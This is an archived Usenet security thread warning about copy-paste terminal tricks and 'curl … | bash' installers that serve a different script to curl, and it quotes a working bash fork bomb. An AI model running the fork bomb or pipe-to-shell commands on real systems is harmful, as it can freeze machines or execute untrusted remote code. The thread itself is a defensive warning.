Rocksolid Light

Welcome to novaBBS

register   nodelist   faq  

Your account also provides newsreader access to all groups at news.i2pn2.org port 119 or 563 (TLS)


rocksolid / Security / Re: careful with copy/pasting shell commands

SubjectAuthor
* careful with copy/pasting shell commandsanonymous
`* Re: careful with copy/pasting shell commandsAnonUser
 `* Re: careful with copy/pasting shell commandsAnonUser
  `* Re: careful with copy/pasting shell commandsanonymous
   `- Re: careful with copy/pasting shell commandsanonymous

1
Subject: careful with copy/pasting shell commands
From: anonym...@def2.anon (anonymous)
Newsgroups: rocksolid.shared.security
Organization: def2org
Date: Sun, 27 Oct 2019 23:04 UTC
Path: i2pn2.org!rocksolid2!def2!.POSTED.localhost!not-for-mail
From: anonym...@def2.anon (anonymous)
Newsgroups: rocksolid.shared.security
Subject: careful with copy/pasting shell commands
Date: Sun, 27 Oct 2019 23:04:43 -0000 (UTC)
Organization: def2org
Message-ID: <fbb0fcf606e91dc9f954dc96ad0edd7a$1@z5bqfv5v75kxy7pj.onion>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Transfer-Encoding: 8bit
Injection-Date: Sun, 27 Oct 2019 23:04:43 -0000 (UTC)
Injection-Info: def2.org; posting-host="localhost:127.0.0.1";
logging-data="4520"; mail-complaints-to="usenet@def2.org"
View all headers
nice poc here:
https://thejh.net/misc/website-terminal-copy-paste
Posted on def2




Subject: Re: careful with copy/pasting shell commands
From: AnonU...@rslight.i2p (AnonUser)
Newsgroups: rocksolid.shared.security
Organization: Rocksolid Light
Date: Mon, 28 Oct 2019 09:28 UTC
Path: i2pn2.org!rocksolid2!.POSTED.localhost!not-for-mail
From: AnonU...@rslight.i2p (AnonUser)
Newsgroups: rocksolid.shared.security
Subject: Re: careful with copy/pasting shell commands
Date: Mon, 28 Oct 2019 09:28:50 -0000 (UTC)
Organization: Rocksolid Light
Message-ID: <1d809f5eca301dd09fde763ae3e63957$1@news.novabbs.com>
References: <fbb0fcf606e91dc9f954dc96ad0edd7a$1@z5bqfv5v75kxy7pj.onion>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Transfer-Encoding: 8bit
Injection-Date: Mon, 28 Oct 2019 09:28:50 -0000 (UTC)
Injection-Info: novabbs.com; posting-account="retrobbs1"; posting-host="localhost:127.0.0.1";
logging-data="28462"; mail-complaints-to="usenet@novabbs.com"
User-Agent: rslight (http://news.novabbs.com)
X-Spam-Checker-Version: SpamAssassin 3.4.2 (2018-09-13) on novabbs.com
X-Rslight-Site: $2y$10$evICAd8mCu6Rfteav.IOCeTCr.ADsRB1WF7pQxcXbRh8TlBxihxnC
View all headers
anonymous wrote:

nice poc here:
https://thejh.net/misc/website-terminal-copy-paste
Posted on def2

Interesting. I guess most of us have been guilty of doing this!


--
Posted on Rocksolid Light



Subject: Re: careful with copy/pasting shell commands
From: anonu...@retrobbs.rocksolidbbs.com.remove-1ao-this (AnonUser)
Newsgroups: rocksolid.shared.security
Organization: RetroBBS
Date: Mon, 28 Oct 2019 09:47 UTC
Path: i2pn2.org!rocksolid3!.POSTED.localhost!not-for-mail
From: anonu...@retrobbs.rocksolidbbs.com.remove-1ao-this (AnonUser)
Newsgroups: rocksolid.shared.security
Subject: Re: careful with copy/pasting shell commands
Date: Mon, 28 Oct 2019 09:47:04 +0000
Organization: RetroBBS
Message-ID: <d9aa72bcf8c9073ec63272ceddceee89$1@retrobbs.i2p>
References: <1d809f5eca301dd09fde763ae3e63957$1@news.novabbs.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Transfer-Encoding: 8bit
Injection-Info: rocksolidbbs.com; posting-host="localhost:127.0.0.1";
logging-data="4915"; mail-complaints-to="usenet@rocksolidbbs.com"
User-Agent: rslight (http://news.novabbs.com)
To: AnonUser
X-Comment-To: AnonUser
In-Reply-To: <1d809f5eca301dd09fde763ae3e63957$1@news.novabbs.com>
X-FTN-PID: Synchronet 3.17a-Linux Dec 29 2018 GCC 6.3.0
X-Spam-Checker-Version: SpamAssassin 3.4.2 (2018-09-13) on rocksolidbbs.com
X-Rslight-Site: $2y$10$0X74VcO4puGYifo.mdts4u.saoWsFA4tQiHmXesesHUCnloEBooKa
X-Gateway: retrobbs.rocksolidbbs.com [Synchronet 3.17a-Linux NewsLink 1.110]
View all headers
  To: AnonUser
There is a similar trick with curl. Many bad projects ask the user to execute a command that looks like:

curl https://example.com/install | bash

You can view the file install.sh inside your browser and it will look like a regular installation file. As soon as you run the above command, the HTTP server is configured in a way that it will detect the curl user-agent and give you a completely different script to execute.
--
Posted on RetroBBS



Subject: Re: careful with copy/pasting shell commands
From: anonym...@def2.anon (anonymous)
Newsgroups: rocksolid.shared.security
Organization: def2org
Date: Mon, 28 Oct 2019 20:46 UTC
Path: i2pn2.org!rocksolid2!def2!.POSTED.localhost!not-for-mail
From: anonym...@def2.anon (anonymous)
Newsgroups: rocksolid.shared.security
Subject: Re: careful with copy/pasting shell commands
Date: Mon, 28 Oct 2019 20:46:03 -0000 (UTC)
Organization: def2org
Message-ID: <5ad9beca1c52744266a0234b1412e4da$1@z5bqfv5v75kxy7pj.onion>
References: <1d809f5eca301dd09fde763ae3e63957$1@news.novabbs.com> <d9aa72bcf8c9073ec63272ceddceee89$1@retrobbs.i2p>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Transfer-Encoding: 8bit
Injection-Date: Mon, 28 Oct 2019 20:46:03 -0000 (UTC)
Injection-Info: def2.org; posting-host="localhost:127.0.0.1";
logging-data="15090"; mail-complaints-to="usenet@def2.org"
View all headers
I guess most of us have been guilty of doing this

I know I have. Same as with the curl command, this is in fact childishly simple, but I never thought about it...
Posted on def2




Subject: Re: careful with copy/pasting shell commands
From: anonym...@def2.anon (anonymous)
Newsgroups: rocksolid.shared.security
Organization: def2org
Date: Sat, 2 Nov 2019 20:19 UTC
Path: i2pn2.org!rocksolid2!def2!.POSTED.localhost!not-for-mail
From: anonym...@def2.anon (anonymous)
Newsgroups: rocksolid.shared.security
Subject: Re: careful with copy/pasting shell commands
Date: Sat, 2 Nov 2019 20:19:02 -0000 (UTC)
Organization: def2org
Message-ID: <f8587adb4ff98d4fc1f75cf78a7c8443$1@z5bqfv5v75kxy7pj.onion>
References: <1d809f5eca301dd09fde763ae3e63957$1@news.novabbs.com> <d9aa72bcf8c9073ec63272ceddceee89$1@retrobbs.i2p> <5ad9beca1c52744266a0234b1412e4da$1@z5bqfv5v75kxy7pj.onion>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Transfer-Encoding: 8bit
Injection-Date: Sat, 2 Nov 2019 20:19:02 -0000 (UTC)
Injection-Info: def2.org; posting-host="localhost:127.0.0.1";
logging-data="11295"; mail-complaints-to="usenet@def2.org"
View all headers
for a similar subject, i found this here by chance:

https://www.howtogeek.com/125157/8-deadly-commands-you-should-never-run-on-linux/

and was impressed by this innocent/weird looking piece of bash code:

:(){ :|: & };: – Fork Bomb

The following line is a simple-looking, but dangerous, bash function:

    :(){ :|: & };:

This short line defines a shell function that creates new copies of itself. The process continually replicates itself, and its copies continually replicate themselves, quickly taking up all your CPU time and memory. This can cause your computer to freeze. It’s basically a denial-of-service attack.
Posted on def2




1
rocksolid light 0.6.6
clearnet i2p tor